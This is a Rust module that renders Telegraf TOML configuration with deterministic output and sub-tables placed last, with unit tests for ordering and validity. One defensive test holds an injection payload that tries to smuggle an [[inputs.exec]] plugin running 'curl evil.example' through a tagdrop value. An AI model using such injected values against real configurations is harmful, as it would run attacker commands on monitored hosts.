//! Turning a [`TelegrafConfig`] into text.
//!
//! The only place in muninn that produces TOML. Two guarantees:
//!
//! **Deterministic.** The same configuration and the same muninn version render
//! byte for byte the same. No timestamps, no generated identifiers, no map
//! iteration order, no locale-dependent formatting.
//!
//! **Ordered, not sorted.** Sub-tables come after every scalar, because Telegraf
//! requires `tagpass`/`tagdrop` at the end of a plugin block. Sorting keys —
//! the reflexive way to make generated output deterministic — puts
//! `[inputs.disk.tagdrop]` before `ignore_fs` and silently breaks every option
//! after it. See `docs/adr/0007-tagdrop-and-render-order.md`.

use std::fmt::Write as _;

use crate::model::{PluginInstance, TelegrafConfig};

const INDENT: &str = "  ";

/// Render a complete configuration.
///
/// `version` appears in the header comment and is the only thing that varies
/// between muninn releases for identical input.
pub fn render(config: &TelegrafConfig, version: &str) -> String {
    let mut out = String::with_capacity(2048);

    header(&mut out, version);

    if !config.agent.is_empty() {
        out.push_str("[agent]\n");
        for (key, value) in &config.agent {
            let _ = writeln!(out, "{INDENT}{key} = {}", value.render());
        }
        out.push('\n');
    }

    let inputs = config.inputs();
    if !inputs.is_empty() {
        section_rule(&mut out, "Inputs");
        for instance in inputs {
            render_instance(&mut out, instance);
        }
    }

    let outputs = config.outputs();
    if !outputs.is_empty() {
        section_rule(&mut out, "Outputs");
        for instance in outputs {
            render_instance(&mut out, instance);
        }
    }

    // Exactly one trailing newline, whatever the last block was — otherwise the
    // byte-for-byte guarantee would depend on which section came last.
    while out.ends_with("\n\n") {
        out.pop();
    }
    out
}

fn header(out: &mut String, version: &str) {
    let _ = writeln!(out, "# Generated by muninn {version} — do not edit.");
    out.push_str("#\n");
    out.push_str("# This file is regenerated from scratch on every start and lives on a tmpfs.\n");
    out.push_str("# Edit the muninn configuration instead; this is only its rendered form.\n");
    out.push_str("#\n");
    out.push_str(
        "# Secret values are shown redacted. The file muninn actually writes at runtime\n",
    );
    out.push_str("# contains the resolved values.\n");
    out.push('\n');
}

fn section_rule(out: &mut String, title: &str) {
    // Padded to a fixed width so the rule does not shift when a title changes
    // length — cosmetic, but it keeps diffs of the generated file small.
    let dashes = 76usize.saturating_sub(title.len() + 6);
    let _ = writeln!(out, "# ── {title} {}", "─".repeat(dashes));
    out.push('\n');
}

fn render_instance(out: &mut String, instance: &PluginInstance) {
    if let Some(provenance) = instance.provenance() {
        let _ = writeln!(out, "# {provenance}");
    }
    let _ = writeln!(out, "{}", instance.header());

    // Scalars first...
    for (key, value) in instance.scalars() {
        let _ = writeln!(out, "{INDENT}{key} = {}", value.render());
    }

    // ...sub-tables last, always. This is the rule the whole module exists for.
    for (name, table) in instance.subtables() {
        let _ = writeln!(
            out,
            "{INDENT}[{}.{}.{name}]",
            section_prefix(instance),
            instance.plugin
        );
        for (key, value) in table.iter() {
            let _ = writeln!(out, "{INDENT}{INDENT}{key} = {}", value.render());
        }
    }

    out.push('\n');
}

fn section_prefix(instance: &PluginInstance) -> &'static str {
    match instance.section {
        crate::model::Section::Input | crate::model::Section::Agent => "inputs",
        crate::model::Section::Output => "outputs",
    }
}

#[cfg(test)]
mod tests {
    use super::*;
    use crate::model::{PluginInstance, TomlTable, TomlValue};

    const V: &str = "0.1.0";

    fn disk_instance() -> PluginInstance {
        PluginInstance::input("disk", 60)
            .from_module("disks")
            .scalar("ignore_fs", vec!["tmpfs", "devtmpfs"])
            .tagdrop("path", &["/snap*".to_string()])
    }

    // ── The ordering rule ───────────────────────────────────────────────────

    /// The property ADR-0007 exists for. Both orderings pass
    /// `telegraf config check`, so this asserts on the rendered bytes — Telegraf
    /// cannot be the judge here.
    #[test]
    fn subtables_are_rendered_after_every_scalar() {
        let mut cfg = TelegrafConfig::new();
        cfg.add(disk_instance());
        let out = render(&cfg, V);

        let scalar_at = out.find("ignore_fs").expect("scalar missing");
        let table_at = out
            .find("[inputs.disk.tagdrop]")
            .expect("sub-table missing");
        assert!(
            scalar_at < table_at,
            "ignore_fs must precede the tagdrop header, or TOML assigns it to the table:\n{out}"
        );
    }

    /// A scalar added *after* a sub-table must still render before it. Enforcing
    /// this in the type — separate fields — is what makes the rule impossible to
    /// break from a module.
    #[test]
    fn a_scalar_added_after_a_subtable_still_renders_first() {
        let instance = PluginInstance::input("disk", 60)
            .tagdrop("path", &["/snap*".to_string()])
            .scalar("ignore_fs", vec!["tmpfs"]);
        let mut cfg = TelegrafConfig::new();
        cfg.add(instance);
        let out = render(&cfg, V);
        assert!(out.find("ignore_fs").unwrap() < out.find("[inputs.disk.tagdrop]").unwrap());
    }

    /// The broken shape from `docs/reference/ordering-broken.conf`, stated as a
    /// property: no line after a sub-table header may be a plugin-level scalar.
    #[test]
    fn the_renderer_cannot_produce_the_broken_ordering() {
        let mut cfg = TelegrafConfig::new();
        cfg.add(disk_instance());
        cfg.add(
            PluginInstance::input("net", 80)
                .tagdrop("interface", &["lo".to_string()])
                .scalar("interfaces", vec!["eth0"]),
        );
        let out = render(&cfg, V);

        let mut inside_subtable = false;
        for line in out.lines() {
            let trimmed = line.trim();
            if trimmed.starts_with("[[") {
                inside_subtable = false;
            } else if trimmed.starts_with('[') {
                inside_subtable = true;
            } else if inside_subtable && trimmed.contains('=') {
                // Sub-table entries are indented one level deeper; a
                // plugin-level scalar here would be swallowed by the table.
                assert!(
                    line.starts_with("    "),
                    "line after a sub-table header is a plugin-level scalar: {line:?}\n{out}"
                );
            }
        }
    }

    // ── Determinism ─────────────────────────────────────────────────────────

    #[test]
    fn rendering_twice_produces_identical_bytes() {
        let mut cfg = TelegrafConfig::new();
        cfg.add(disk_instance());
        cfg.add(PluginInstance::input("cpu", 10).scalar("percpu", true));
        cfg.add(PluginInstance::output("influxdb_v2", 10).scalar("token", "***"));
        assert_eq!(render(&cfg, V), render(&cfg, V));
    }

    /// The output must be a function of the configuration, not of the order the
    /// modules happened to run in.
    #[test]
    fn insertion_order_does_not_change_the_output() {
        let build = |reverse: bool| {
            let mut cfg = TelegrafConfig::new();
            let mut instances = vec![
                PluginInstance::input("cpu", 10).scalar("percpu", true),
                PluginInstance::input("mem", 20),
                PluginInstance::input("net", 80).tagdrop("interface", &["lo".to_string()]),
            ];
            if reverse {
                instances.reverse();
            }
            for i in instances {
                cfg.add(i);
            }
            render(&cfg, V)
        };
        assert_eq!(build(false), build(true));
    }

    #[test]
    fn the_output_carries_no_timestamp_or_generated_identifier() {
        let mut cfg = TelegrafConfig::new();
        cfg.add(disk_instance());
        let out = render(&cfg, V);
        for marker in ["20", "T0", "Z\n", "uuid", "id="] {
            // "20" would catch a year; the config here has no numeric options,
            // so any digit pair is suspicious.
            assert!(
                !out.contains(marker),
                "output contains {marker:?}, which suggests generated content:\n{out}"
            );
        }
    }

    #[test]
    fn the_output_ends_with_exactly_one_newline() {
        let mut cfg = TelegrafConfig::new();
        cfg.add(disk_instance());
        let out = render(&cfg, V);
        assert!(out.ends_with('\n'));
        assert!(
            !out.ends_with("\n\n"),
            "trailing blank lines are not stable"
        );
    }

    // ── Shape ───────────────────────────────────────────────────────────────

    #[test]
    fn the_agent_section_renders_first_and_unindexed() {
        let mut cfg = TelegrafConfig::new()
            .agent_option("interval", "30s")
            .agent_option("omit_hostname", false);
        cfg.add(PluginInstance::input("cpu", 10));
        let out = render(&cfg, V);

        assert!(out.contains("[agent]\n  interval = \"30s\"\n  omit_hostname = false\n"));
        assert!(
            out.find("[agent]").unwrap() < out.find("[[inputs.cpu]]").unwrap(),
            "the agent block comes first"
        );
        assert!(!out.contains("[[agent]]"), "agent is a table, not an array");
    }

    #[test]
    fn outputs_render_after_inputs() {
        let mut cfg = TelegrafConfig::new();
        cfg.add(PluginInstance::output("influxdb_v2", 10));
        cfg.add(PluginInstance::input("cpu", 10));
        let out = render(&cfg, V);
        assert!(out.find("[[inputs.cpu]]").unwrap() < out.find("[[outputs.influxdb_v2]]").unwrap());
    }

    #[test]
    fn a_note_renders_as_a_comment_above_its_block() {
        let mut cfg = TelegrafConfig::new();
        cfg.add(PluginInstance::input("cpu", 10).from_module("cpu"));
        assert!(render(&cfg, V).contains("# module: cpu\n[[inputs.cpu]]\n"));
    }

    /// Several Telegraf plugins take no options at all (`inputs.swap`,
    /// `inputs.mem`), so a bare header has to be a valid thing to emit.
    #[test]
    fn a_plugin_with_no_options_renders_as_a_bare_header() {
        let mut cfg = TelegrafConfig::new();
        cfg.add(PluginInstance::input("swap", 40).from_module("swap"));
        cfg.add(PluginInstance::input("net", 80).scalar("interfaces", vec!["eth0"]));
        let out = render(&cfg, V);

        // Assert on the block rather than on the trailing newlines around it:
        // whether a blank line follows depends on where the block falls in the
        // file, which is not what this test is about.
        let block: Vec<&str> = out
            .lines()
            .skip_while(|l| !l.starts_with("# module: swap"))
            .take_while(|l| !l.trim().is_empty())
            .collect();
        assert_eq!(block, vec!["# module: swap", "[[inputs.swap]]"]);
    }

    #[test]
    fn sub_table_headers_are_fully_qualified() {
        let mut cfg = TelegrafConfig::new();
        cfg.add(PluginInstance::output("prometheus_client", 20).subtable(
            "metric_types",
            TomlTable::new().entry("counter", TomlValue::Array(vec![])),
        ));
        assert!(render(&cfg, V).contains("[outputs.prometheus_client.metric_types]"));
    }

    /// An empty configuration is a bug elsewhere — validation refuses one with
    /// no modules or no outputs — but the renderer must not panic on it.
    #[test]
    fn an_empty_configuration_renders_to_just_the_header() {
        let cfg = TelegrafConfig::new();
        let out = render(&cfg, V);
        assert!(out.starts_with("# Generated by muninn 0.1.0"));
        assert!(!out.contains("[["));
    }

    // ── The generated file is valid TOML ────────────────────────────────────

    /// Not a substitute for `telegraf config check` — that runs in the
    /// verification script — but it catches structural mistakes in the renderer
    /// itself without needing Docker.
    #[test]
    fn the_rendered_output_parses_as_toml() {
        let mut cfg = TelegrafConfig::new()
            .agent_option("interval", "30s")
            .agent_option("metric_batch_size", 1000i64);
        cfg.add(disk_instance());
        cfg.add(
            PluginInstance::input("net", 80)
                .scalar("interfaces", vec!["eth0"])
                .tagdrop("interface", &["lo".to_string(), "veth*".to_string()]),
        );
        cfg.add(
            PluginInstance::output("influxdb_v2", 10)
                .scalar("urls", vec!["https://influx.example:8086"])
                .scalar("token", "***"),
        );

        let out = render(&cfg, V);
        let parsed: toml::Value = toml::from_str(&out)
            .unwrap_or_else(|e| panic!("renderer produced invalid TOML: {e}\n{out}"));

        // And the sub-table landed where it belongs: on the plugin, not
        // swallowing the scalar next to it.
        let disk = &parsed["inputs"]["disk"][0];
        assert!(
            disk.get("ignore_fs").is_some(),
            "ignore_fs must be a plugin option"
        );
        assert!(
            disk["tagdrop"].get("path").is_some(),
            "tagdrop must carry the path rule"
        );
        assert!(
            disk["tagdrop"].get("ignore_fs").is_none(),
            "ignore_fs must not have been swallowed by the tagdrop table"
        );
    }

    /// A hostile configuration value must not be able to add a plugin.
    #[test]
    fn an_operator_value_cannot_inject_a_plugin_into_the_file() {
        let mut cfg = TelegrafConfig::new();
        cfg.add(PluginInstance::input("disk", 60).tagdrop(
            "path",
            &["x\"\n[[inputs.exec]]\ncommands = [\"curl evil.example\"]\n#".to_string()],
        ));
        let out = render(&cfg, V);
        let parsed: toml::Value = toml::from_str(&out).expect("must still be valid TOML");
        assert!(
            parsed["inputs"].get("exec").is_none(),
            "a configuration value injected a plugin:\n{out}"
        );
    }
}
